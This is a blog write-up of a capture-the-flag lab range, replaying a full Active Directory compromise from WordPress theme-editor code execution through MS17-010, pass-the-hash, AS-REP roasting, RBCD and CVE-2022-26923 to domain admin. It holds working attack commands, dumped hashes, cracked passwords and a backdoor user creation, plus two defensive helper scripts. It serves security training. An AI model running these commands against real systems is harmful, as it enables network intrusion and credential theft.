Chunqiu Yunjing (春秋云镜): 2022 Wangding Cup Semifinal Range Replay

This post was last updated in the early hours of July 24, 2025.

AS-REP Roasting, WordPress RCE, RBCD, CVE-2022-26923

Information gathering

fscan

Nothing useful.

dirsearch

Found a pile of paths:

[01:14:02] 301 -    0B  - /index.php  ->  http://39.99.132.104/
[01:14:04] 200 - 19KB - /license.txt
[01:14:11] 200 - 7KB - /readme.html
[01:14:12] 403 - 278B - /server-status
[01:14:12] 403 - 278B - /server-status/
[01:14:18] 200 - 0B - /wp-config.php
[01:14:18] 301 - 317B - /wp-admin -> http://39.99.132.104/wp-admin/
[01:14:18] 200 - 0B - /wp-content/
[01:14:18] 409 - 3KB - /wp-admin/setup-config.php
[01:14:18] 200 - 1KB - /wp-admin/install.php
[01:14:18] 302 - 0B - /wp-admin/ -> http://39.99.132.104/wp-login.php?redirect_to=http%3A%2F%2F39.99.132.104%2Fwp-admin%2F&reauth=1
[01:14:18] 301 - 319B - /wp-content -> http://39.99.132.104/wp-content/
[01:14:18] 400 - 1B - /wp-admin/admin-ajax.php
[01:14:18] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[01:14:18] 500 - 0B - /wp-content/plugins/hello.php
[01:14:18] 200 - 1KB - /wp-content/uploads/
[01:14:18] 200 - 777B - /wp-content/upgrade/
[01:14:18] 200 - 0B - /wp-includes/rss-functions.php
[01:14:18] 200 - 5KB - /wp-login.php
[01:14:18] 200 - 0B - /wp-cron.php
[01:14:18] 302 - 0B - /wp-signup.php -> http://39.99.132.104/wp-login.php?action=register
[01:14:18] 301 - 320B - /wp-includes -> http://39.99.132.104/wp-includes/
[01:14:18] 200 - 54KB - /wp-includes/
[01:14:19] 405 - 42B - /xmlrpc.php

WordPress plugin RCE

wp-admin loads and shows a WordPress login form.

admin:123456 logs in. The theme file editor is available, so I edited a PHP file directly.

Connected to it at this path:

http://39.99.132.104/wp-admin/theme-editor.php?file=functions.php

Got flag01 in the web root:

flag01: flag{9a8904be-64af-4faa-a667-d6ef0bc0ad64}

MS17-010

Uploaded fscan and scanned the internal network:

[2025-07-19 01:36:07] [HOST] 目标:172.22.15.13 状态:alive 详情:protocol=ICMP
[2025-07-19 01:36:08] [HOST] 目标:172.22.15.18 状态:alive 详情:protocol=ICMP
[2025-07-19 01:36:10] [HOST] 目标:172.22.15.24 状态:alive 详情:protocol=ICMP
[2025-07-19 01:36:10] [HOST] 目标:172.22.15.26 状态:alive 详情:protocol=ICMP
[2025-07-19 01:36:10] [HOST] 目标:172.22.15.35 状态:alive 详情:protocol=ICMP
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.18 状态:open 详情:port=445
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.13 状态:open 详情:port=445
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.13 状态:open 详情:port=139
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.13 状态:open 详情:port=389
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.13 状态:open 详情:port=135
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.13 状态:open 详情:port=88
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.18 状态:open 详情:port=139
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.18 状态:open 详情:port=135
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.18 状态:open 详情:port=80
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.24 状态:open 详情:port=3306
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.24 状态:open 详情:port=445
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.24 状态:open 详情:port=139
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.24 状态:open 详情:port=135
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.24 状态:open 详情:port=80
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.26 状态:open 详情:port=22
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.26 状态:open 详情:port=80
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.35 状态:open 详情:port=445
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.35 状态:open 详情:port=139
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.35 状态:open 详情:port=135
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.18 状态:identified 详情:hostname=XR-CA, ipv4=[172.22.15.18], ipv6=[]
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.35 状态:identified 详情:port=139, domain_name=XIAORANG, workstation_service=XR-0687, server_service=XR-0687
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.13 状态:identified 详情:ipv4=[172.22.15.13], ipv6=[], hostname=XR-DC01
[2025-07-19 01:36:16] [VULN] 目标:172.22.15.24 状态:vulnerable 详情:port=445, vulnerability=MS17-010, os=Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.35 状态:identified 详情:ipv4=[172.22.15.35], ipv6=[], hostname=XR-0687
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.13 状态:identified 详情:service=smb, os=Windows Server 2016 Standard 14393, port=445
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.24 状态:identified 详情:hostname=XR-WIN08, ipv4=[172.22.15.24], ipv6=[]
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.26 状态:identified 详情:Url=http://172.22.15.26, status_code=200, length=39962, server_info=map[content-type:text/html; charset=UTF-8 date:Fri, 18 Jul 2025 17:36:16 GMT length:39962 link:<http://172.22.15.26/index.php/wp-json/>; rel="https://api.w.org/" server:Apache/2.4.41 (Ubuntu) status_code:200 title:XIAORANG.LAB vary:Accept-Encoding], fingerprints=[], port=80, service=http, title=XIAORANG.LAB
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.18 状态:identified 详情:workstation_service=XR-CA, server_service=XR-CA, os_version=Windows Server 2016 Standard 14393, port=139, computer_name=XR-CA.xiaorang.lab, domain_name=xiaorang.lab, netbios_domain=XIAORANG, netbios_computer=XR-CA
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.18 状态:identified 详情:length=703, server_info=map[accept-ranges:bytes content-length:703 content-type:text/html date:Fri, 18 Jul 2025 17:36:16 GMT etag:"87cafbaec95d91:0" last-modified:Sat, 03 Jun 2023 07:26:35 GMT length:703 server:Microsoft-IIS/10.0 status_code:200 title:IIS Windows Server], fingerprints=[], port=80, service=http, title=IIS Windows Server, Url=http://172.22.15.18, status_code=200
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.13 状态:identified 详情:port=139, computer_name=XR-DC01.xiaorang.lab, domain_name=xiaorang.lab, netbios_domain=XIAORANG, server_service=XR-DC01, domain_controllers=XIAORANG, netbios_computer=XR-DC01, workstation_service=XR-DC01, os_version=Windows Server 2016 Standard 14393
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.24 状态:identified 详情:workstation_service=XR-WIN08, server_service=XR-WIN08, os_version=Windows Server 2008 R2 Enterprise 7601 Service Pack 1, port=139, computer_name=XR-WIN08, domain_name=XR-WIN08, netbios_domain=XR-WIN08, netbios_computer=XR-WIN08
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.24 状态:identified 详情:length=0, server_info=map[content-length:0 content-type:text/html date:Fri, 18 Jul 2025 17:36:16 GMT length:0 location:/www redirect_Url:http://172.22.15.24/www server:Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 status_code:302 title:无标题 x-powered-by:PHP/5.5.9], fingerprints=[], port=80, service=http, title=无标题, Url=http://172.22.15.24, status_code=302
[2025-07-19 01:36:18] [SERVICE] 目标:172.22.15.24 状态:identified 详情:status_code=200, length=135, server_info=map[cache-control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0 content-type:text/html date:Fri, 18 Jul 2025 17:36:17 GMT expires:Thu, 19 Nov 1981 08:52:00 GMT length:135 pragma:no-cache server:Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 set-cookie:rid=vv8286s2m8eiiue19vuvkdbcn4; path=/ status_code:200 title:无标题 x-powered-by:PHP/5.5.9], fingerprints=[], port=80, service=http, title=无标题, Url=http://172.22.15.24/www

Summary:

172.22.15.13  XR-DC01   domain xiaorang.lab
172.22.15.18  XR-CA     also in xiaorang.lab
172.22.15.24  80, 3306  XR-WIN08  MS17-010
172.22.15.35  445, 139  XR-0687
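The hand-written summary above can be produced mechanically from the fscan log. The parser below is an added example written for this replay, not part of the original post or of fscan itself; it assumes the record layout shown above and embeds a constructed subset of those lines as sample input.

```python
import re
from collections import defaultdict

# Constructed sample in the same format as the fscan run above (a subset of its lines).
SAMPLE_LOG = """\
[2025-07-19 01:36:07] [HOST] 目标:172.22.15.13 状态:alive 详情:protocol=ICMP
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.13 状态:open 详情:port=88
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.24 状态:open 详情:port=3306
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.24 状态:open 详情:port=445
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.24 状态:open 详情:port=80
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.13 状态:identified 详情:ipv4=[172.22.15.13], ipv6=[], hostname=XR-DC01
[2025-07-19 01:36:16] [VULN] 目标:172.22.15.24 状态:vulnerable 详情:port=445, vulnerability=MS17-010, os=Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.24 状态:identified 详情:hostname=XR-WIN08, ipv4=[172.22.15.24], ipv6=[]
"""

# One fscan record: "[timestamp] [KIND] 目标:<target> 状态:<state> 详情:<key=value, ...>"
LINE_RE = re.compile(
    r"^\[[^\]]*\] \[(?P<kind>[A-Z]+)\] 目标:(?P<target>\S+) 状态:(?P<state>\S+) 详情:(?P<details>.*)$"
)
KV_RE = re.compile(r"(\w+)=([^,]*)")  # sufficient for the flat keys read below

def parse_line(line):
    """Return (kind, target, state, details-dict) or None for a non-record line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    details = {k: v.strip() for k, v in KV_RE.findall(m.group("details"))}
    return m.group("kind"), m.group("target"), m.group("state"), details

def summarize(log_text):
    """Fold HOST/PORT/SERVICE/VULN records into one entry per target IP."""
    hosts = defaultdict(lambda: {"ports": set(), "hostname": None, "os": None, "vulns": []})
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        kind, target, _state, d = parsed
        h = hosts[target]
        if kind == "PORT" and "port" in d:
            h["ports"].add(int(d["port"]))
        elif kind == "SERVICE":
            if h["hostname"] is None:  # keep the first name seen (short hostname preferred)
                h["hostname"] = d.get("hostname") or d.get("computer_name")
            h["os"] = d.get("os_version") or h["os"]
        elif kind == "VULN":
            h["vulns"].append(d.get("vulnerability", "unknown"))
            h["os"] = d.get("os") or h["os"]
    return {ip: {**v, "ports": sorted(v["ports"])} for ip, v in hosts.items()}
```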

172.22.15.24 is vulnerable to EternalBlue (MS17-010).

As usual, upload frpc and frpc.ini for traffic forwarding, then run msf through proxychains to exploit EternalBlue:

proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
run

For some reason running shell timed out, so I ran hashdump instead:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Then run:

proxychains impacket-psexec administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk

Got SYSTEM.

Went into the Administrator user's directory

and got flag02:

flag02: flag{65518b91-b026-4cfd-a62e-75aea9d458f6}

RDP

Scanning the directories of 172.22.15.24 turned up phpMyAdmin, but I had no password for it. However, phpstudy sits on this machine's desktop, so remote desktop was worth trying; first add a user:

net user butt3rf1y qwe456@ /add
net localgroup administrators butt3rf1y /add

Viewed phpstudy over the remote desktop session and got two passwords:

root root@#123
zdoo zdoo123

Logged into phpMyAdmin with the root account; the zdoosys_user table in the zdoo database holds a lot of domain user information, so I saved it first.

ZDOO OA

Found the site hosted by phpstudy and tried logging in as zdoo:zdoo123, which failed.

admin:123456 logged in successfully. It exposes some user information, but we already had that from the database.

AS-REP Roasting

Try an AS-REP Roasting attack:

proxychains impacket-GetNPUsers -dc-ip 172.22.15.13  xiaorang.lab/ -usersfile user.txt

Got back two AS-REP hashes:

$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:beb6333f35e707252e4e869ffed9b20f$75941020628623dc735e3b60ed28131e974c7725788c93d53034211419a12878a24ff34d77fe4f2db6f5364a68c1120cd1958eb758b2e23b1f7d8e117e03ab0503a916da4e7bd75bfb17514266253598c020093b5d17d536caeedbbea4ed8f1b000c168cb75c6e0937ca877aed51334a0c8c36efa487a534fed1e25ef2f5725488da057aa0c4f89cdb2f4341db8297c810a21765394e7426513ca83f98557eaa4230d1d6ecd6f723034340c5d4cc2fc67ea88feb620325c3042b584dd59224b8b6618aa89607c71227d51c1068a85617cd91f549a9f155c594bb96bf824d7755d194042ce253f4cca684574a

$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:947a93f5ea00c81d436c808d791742ad$5819df23d5c9779825928b8e7cac411362fe1aca403eb601ea80fcb08b5d8a3fd3ed06201e1bd05abee4c026359b1eac57a69dceed7c5842bd15641f04c312cf2658fc66319b594b9d42a4d5b070e40dfab0d63a04f278f08634f804f285638ea4240954b6b87fad1d7963d2ca462d85b4da4d566847929155bdb9e3dd3c2d97082f962239f6412a2de8643b5e433c0464a896428adcd7e1bbb25230d2065f2e79abcf0b2f0132ca72a2f5fa6d072860098f16f6110fac48732c4d458ea6ab7a219edf8fda033eabcf8e474b790d634183fd5b49ef0ad525034fb1ce643dceb7fce754fdde066e2ca1e4ba70

Cracked them with hashcat; two passwords came out:

lixiuying@xiaorang.lab:winniethepooh
huachunmei@xiaorang.lab:1qaz2wsx

Continue on to 172.22.15.35 via RDP; run bloodhound-python first:

proxychains4 bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp

Import the data into BloodHound and look at the domain relationship graph.

BloodHound shows that LIXIUYING@XIAORANG.LAB has GenericWrite over XR-0687.XIAORANG.LAB, the familiar RBCD setup.

RBCD

Add a machine account:

proxychains impacket-addcomputer -method SAMR xiaorang.lab/lixiuying:winniethepooh -computer-name butt3rf1y$ -computer-pass 'u4happy@' -dc-ip 172.22.15.13

Modify the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of XR-0687$:

proxychains -q impacket-rbcd xiaorang.lab/lixiuying:winniethepooh -action write -delegate-from "butt3rf1y$" -delegate-to "XR-0687$" -dc-ip 172.22.15.13

butt3rf1y$   (S-1-5-21-3745972894-1678056601-2622918667-1147)

Use impacket's getST to carry out the RBCD attack and obtain a Kerberos service ticket (TGS) for the machine:

proxychains -q impacket-getST xiaorang.lab/butt3rf1y$:'u4happy@' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

Import the ticket:

export KRB5CCNAME=Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache

Access the target host directly:

proxychains -q impacket-psexec 'xiaorang.lab/administrator@XR-0687.xiaorang.lab' -target-ip 172.22.15.35 -codec gbk -no-pass -k

Got flag03 under C:\Users\Administrator\flag:

flag03: flag{e8893d4e-1e26-4e14-a8ff-5eff3b928f81}

CVE-2022-26923

The last host left was 172.22.15.18, which holds the CA; fscan had flagged an Active Directory Certificate Services vulnerability on it.

After some searching this turned out to be CVE-2022-26923, a Windows domain privilege escalation; see the ADCS attack notes:

When Active Directory Certificate Services (AD CS) runs in a Windows domain, the dNSHostName attribute of machine accounts is not required to be unique, so an ordinary domain user can change it to match a high-privilege domain controller machine account, then obtain a certificate for the domain controller's machine account from AD CS, escalating an ordinary domain user to domain administrator.
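As an added defender-side check (not from the original post or the referenced notes), the script below audits machine accounts for the precondition this CVE abuses: a dNSHostName that does not match the account's own name, or one shared by two accounts. The account records are a constructed sample modelled on this lab; the attribute names are the real AD attribute names.

```python
from collections import defaultdict

# Constructed sample of machine-account attributes, as an LDAP export would list them.
# XR-DC01$ and XR-0687$ are legitimate; butt3rf2y$ mirrors the account created in the replay.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "XR-DC01$", "dNSHostName": "XR-DC01.xiaorang.lab"},
    {"sAMAccountName": "XR-0687$", "dNSHostName": "XR-0687.xiaorang.lab"},
    {"sAMAccountName": "butt3rf2y$", "dNSHostName": "XR-DC01.xiaorang.lab"},
    {"sAMAccountName": "XR-NEW$"},  # freshly joined, dNSHostName not yet set
]

def expected_dns_name(sam_account_name, domain):
    """The only dNSHostName a machine account should carry: <name without $>.<domain>."""
    return f"{sam_account_name.rstrip('$')}.{domain}".lower()

def audit_dns_hostnames(computers, domain):
    """Return findings as tuples: ('mismatch', account, dns) and ('duplicate', dns, [accounts])."""
    findings = []
    owners = defaultdict(list)  # dNSHostName -> accounts claiming it
    for c in computers:
        dns = (c.get("dNSHostName") or "").lower()
        sam = c["sAMAccountName"]
        if not dns:
            continue  # nothing to check; an unset attribute cannot collide
        owners[dns].append(sam)
        if dns != expected_dns_name(sam, domain):
            findings.append(("mismatch", sam, dns))
    for dns, sams in owners.items():
        if len(sams) > 1:
            findings.append(("duplicate", dns, sorted(sams)))
    return findings
```

A mismatch is not always malicious (renamed hosts exist), but a non-DC account claiming a domain controller's name is exactly the state an AD CS request would then turn into a DC certificate.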

Create a machine account whose dNSHostName attribute points at the domain controller. First install certipy-ad (Certipy):

proxychains certipy-ad account create -user 'butt3rf2y$' -pass 'p4ppy' -dc-ip 172.22.15.13 -u lixiuying -p 'winniethepooh' -dns XR-DC01.xiaorang.lab

Once that is written, request the domain controller's certificate from AD CS:

proxychains certipy-ad req -u 'butt3rf2y$@xiaorang.lab' -p 'p4ppy' -target 172.22.15.18 -ca 'xiaorang-XR-CA-CA' -template 'Machine'

Then use the issued certificate to request a TGT for DC$:

proxychains certipy-ad auth -pfx xr-dc01.pfx -dc-ip 172.22.15.13

Hit an error:

Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

This error means the KDC does not support PKINIT (typically because the domain controller holds no certificate usable for it), so the certificate cannot be exchanged for a TGT directly. So I switched to an RBCD-based route instead: pass the certificate to LDAPS over Schannel and modify LDAP (e.g. configure RBCD / DCSync) to obtain domain-controller privileges. First split the PFX into certificate and key:

openssl pkcs12 -in xr-dc01.pfx -out xr-dc01.pem -nodes
openssl rsa -in xr-dc01.pem -out xr-dc01.key
openssl x509 -in xr-dc01.pem -out xr-dc01.crt

Tool: https://github.com/AlmondOffSec/PassTheCert/

Check who the certificate authenticates as:

proxychains python3 PassTheCert-main/Python/passthecert.py -action whoami -crt xr-dc01.crt -key xr-dc01.key -domain xiaorang.lab -dc-ip 172.22.15.13

Use the certificate to configure RBCD on the domain controller:

proxychains python3 PassTheCert-main/Python/passthecert.py -action write_rbcd -crt xr-dc01.crt -key xr-dc01.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'butt3rf2y$'

Request a service ticket (ST):

proxychains impacket-getST xiaorang.lab/'butt3rf2y$':'p4ppy' -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

Then import it:

export KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache

Add a hosts entry:

172.22.15.13	XR-DC01.xiaorang.lab

Then just connect:

proxychains impacket-psexec Administrator@XR-DC01.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13

Got flag04:

flag04: flag{c2278fc6-e66f-4f16-827a-84ffcd44b462}

Author: butt3rf1y
Published July 23, 2025
http://example.com/2025/07/23/春秋云镜-2022网鼎半决赛复盘/